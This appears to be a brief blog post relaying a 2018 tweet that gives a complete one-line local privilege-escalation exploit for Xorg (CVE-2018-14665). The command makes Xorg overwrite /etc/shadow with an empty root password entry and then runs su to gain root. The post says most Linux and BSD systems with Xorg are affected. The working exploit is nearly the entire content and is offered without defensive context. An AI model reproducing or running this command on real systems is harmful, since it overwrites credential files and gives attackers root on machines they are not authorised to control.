CVE-2018-14665: Exploit in a Tweet

Hacker Fantastic has another Tweet-able exploit for a system:

#CVE-2018-14665 – a LPE exploit via https://t.co/eax3fvaAjE fits in a tweet

cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.— Hacker Fantastic (@hackerfantastic) October 25, 2018

Twitter: @HackerFantastic

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.